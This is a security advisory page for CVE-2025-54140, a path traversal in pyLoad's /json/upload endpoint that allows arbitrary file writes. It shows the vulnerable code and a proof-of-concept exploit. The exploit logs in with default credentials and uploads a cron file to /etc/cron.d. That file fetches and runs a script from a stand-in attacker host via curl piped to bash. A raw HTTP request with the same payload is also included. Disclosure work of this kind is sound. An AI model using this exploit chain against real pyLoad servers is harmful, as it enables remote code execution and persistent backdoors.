logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-54140 pyload-ng

Package

Manager: pip
Name: pyload-ng
Vulnerable Version: =0.5.0b3.dev89 || >=0.5.0b3.dev89 <0.5.0b3.dev90

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00266 pctl0.49826

Details

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write ## Summary An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to: * **Remote Code Execution (RCE)** * **Local Privilege Escalation** * **System-wide compromise** * **Persistence and backdoors** --- ### Vulnerable Code File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109) ```python @json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path) ``` **Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences. ### (Proof of Concept) 1. **Clone and install pyLoad from source** (`pip install pyload-ng`): ```bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload ``` 2. **Or install via pip (PyPi) in virtualenv:** ```bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload ``` 1. **Login and obtain session token** ```bash curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin" ``` 2. **Create malicious cron payload** ```bash echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit ``` 3. **Upload file with path traversal filename** ```bash curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor" ``` 4. On the next cron tick, a reverse shell or payload will be triggered. ### BurpSuite HTTP Request ``` POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e --------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream */1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e-- ```

Metadata

Created: 2025-07-21T21:16:06Z
Modified: 2025-07-23T13:37:09Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xqpg-92fq-grfg/GHSA-xqpg-92fq-grfg.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-xqpg-92fq-grfg
Finding: F063
Auto approve: 1